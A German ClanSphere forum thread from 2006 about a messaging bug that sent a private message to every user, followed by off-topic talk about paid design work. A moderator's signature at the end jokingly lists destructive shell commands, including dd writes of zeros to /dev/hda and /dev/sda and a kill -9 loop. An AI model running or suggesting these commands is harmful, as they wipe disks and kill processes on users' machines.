Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 18
Seite [1]
r0cc0


Wannabe poster




Herkunft: Stade
Beiträge: 20
# Thema - 02.10.2006 um 14:06 Uhr
Hallo Leute, der eine oder andere wird sich wohl gewudet haben, wieso er eine private MSG von mir bekommen hat. Eigentlich war diese MSG nicht an alle gerichtet, war ein Fehler meinerseits.

Also sry, wenn ich bei dem einen oder anderen für Verwirrung gesorgt habe

MfG

r0cc0


------------------
http://www.komplettDSL.de - Komplett einfach, einfach komplett!

Banner +-


Zuletzt editiert von r0cc0 am 02.10.2006 um 14:06 Uhr (1x Editiert)
Inaktiv
kasrk1n ClanSphere Team


Poststar





Beiträge: 703
# Antwort: 1 - 02.10.2006 um 14:11 Uhr
^^


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 2 - 02.10.2006 um 14:21 Uhr
hmm bekomme von dir eine automatische Reply Nachricht, obwohl ich dir garkeine Nachricht geschrieben habe :(


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
r0cc0
Thread-Ersteller


Wannabe poster




Herkunft: Stade
Beiträge: 20
# Antwort: 3 - 02.10.2006 um 14:22 Uhr
lol? grad hab ich eine msg mit "test" von dir erhalten...


------------------
http://www.komplettDSL.de - Komplett einfach, einfach komplett!

Banner +-


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 4 - 02.10.2006 um 14:22 Uhr
oki, hier scheint ein großer bug vorzuliegen, wenn man sich selber eine Nachricht schreibtn, geht die an Alle User.

ist ja lolig


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
h0n1g


Geekboy




Beiträge: 1013
# Antwort: 5 - 02.10.2006 um 14:26 Uhr
Nos² darf das fixen...

evtl. eine sperre einbauen das user nicht an die eigene id senden können, damit sollte das problem selbst gelöst sein


------------------
ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
r0cc0
Thread-Ersteller


Wannabe poster




Herkunft: Stade
Beiträge: 20
# Antwort: 6 - 02.10.2006 um 14:31 Uhr
stimmt, da fällt mir was ein...nachdem ich aus versehen die Massen-MSG losgeschickt habe, kam irgendeine Fehlermeldung, aufgrund dessen, dass ich diese an mich selbst auch verschickt hab...habe diese aber trotzdem erhalten...


------------------
http://www.komplettDSL.de - Komplett einfach, einfach komplett!

Banner +-


Inaktiv
|
Timpe


King for a day





Beiträge: 302
# Antwort: 7 - 02.10.2006 um 14:34 Uhr
also nix mit anpassen?


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 8 - 02.10.2006 um 14:36 Uhr
also nix mit anpassen?


????


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Timpe


King for a day





Beiträge: 302
# Antwort: 9 - 02.10.2006 um 14:38 Uhr
hatte ne msg von rocco bzgl. ner bxcp anpassung bekommen ....


Zuletzt editiert von serenity am 02.10.2006 um 14:38 Uhr (1x Editiert)
Inaktiv
|
racor


Going for pro




Beiträge: 476
# Antwort: 10 - 02.10.2006 um 15:35 Uhr
Das hatte jeder .. ich hatte rocco mittlerweile sogar im ICQ geaddet ^^


------------------

ONLINE PORTFOLIO

Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 11 - 02.10.2006 um 15:50 Uhr
die frage ist ja nun an wenn sollte sie denn gehen ? ^^


Inaktiv
|
racor


Going for pro




Beiträge: 476
# Antwort: 12 - 02.10.2006 um 16:34 Uhr
Soweit ich weiss .. und ich bin mir ziemlich sicher .... sollte sie an cocor gehen ..^^


------------------

ONLINE PORTFOLIO

Inaktiv
|
r0cc0
Thread-Ersteller


Wannabe poster




Herkunft: Stade
Beiträge: 20
# Antwort: 13 - 03.10.2006 um 22:30 Uhr
jep racor, hast du recht...

jedoch findet cocor nicht die zeit dazu...ich bin am überlegen, das 2. Design zu erwerben, nun müsste ich vorher natürlich wissen, ob es hier jemanden gibt, der das Design für mich an Clansphere anpassen könnte? Ich weiss, dass die Anpassung aufwendig ist, daher wird derjenige natürlich auch entlohnt...


------------------
http://www.komplettDSL.de - Komplett einfach, einfach komplett!

Banner +-


Inaktiv
|
Timpe


King for a day





Beiträge: 302
# Antwort: 14 - 03.10.2006 um 23:44 Uhr
also willst du bis zum cs release warten?


Inaktiv
|
r0cc0
Thread-Ersteller


Wannabe poster




Herkunft: Stade
Beiträge: 20
# Antwort: 15 - 04.10.2006 um 00:26 Uhr
jep, auf jeden fall...will ja denn schliesslich up to date sein, wenn mein neues projekt losgeht

...wird ja wohl, hoffe ich zumindest, nicht sooo lange dauern


------------------
http://www.komplettDSL.de - Komplett einfach, einfach komplett!

Banner +-


Zuletzt editiert von r0cc0 am 04.10.2006 um 00:27 Uhr (1x Editiert)
Inaktiv
|
Neurologe


King for a day




Herkunft: Rieneck
Beiträge: 351
# Antwort: 16 - 04.10.2006 um 01:28 Uhr
frage:

soll das design auch gesliced werden? oder nur die anpassung ans clansphere?

nächste frage -> offtopic: findet sich hier kein designer der gewillt ist mir gegen nen guten preis was zu machen *verzweifel*

@ topic: fand die nachricht intressant hab schon gedacht ich bekomm mal arbeit *g*


------------------
Meine aktuell veröffentlichten Clansphere Module & Addons:
>>>>>>> Klick mich <<<<<<<

---> Ich habe fertig <---


Fun +-

(__/)
(O.o )
(> < )

This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

Einstein sagte zu der Dummheit der Menschen:"Zwei Dinge sind unendlich. Zum einen das Universum, zum anderen die menschliche Dummheit. Doch bei dem Universum bin ich mir noch nicht sicher."

Deutsche FSK:
FSK 12 : Der Gute bekomm das Mädchen.
FSK 16 : Der Böse bekommt das Mädchen.
FSK 18 : Alle bekommen das Mädchen.



Meine Projekte?
Gaming:
http://team-saim.eu
Musik:
http://überschall.net
http://yoursound.info

ps: wer rechtschreibfehler findet darf sie behalten

Inaktiv
|
r0cc0
Thread-Ersteller


Wannabe poster




Herkunft: Stade
Beiträge: 20
# Antwort: 17 - 04.10.2006 um 02:57 Uhr
frage:

soll das design auch gesliced werden? oder nur die anpassung ans clansphere?


die frage beantworte ich dir so, mit dem erwerb würde ich nur die *.psd-file erhalten ^^


------------------
http://www.komplettDSL.de - Komplett einfach, einfach komplett!

Banner +-


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 18 - 05.10.2006 um 01:12 Uhr
Soetwas bitte über PM klären.
Bevor es noch mehr Offtopic wird


/closed.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 18
Seite [1]


Sie müssen sich registrieren, um zu antworten.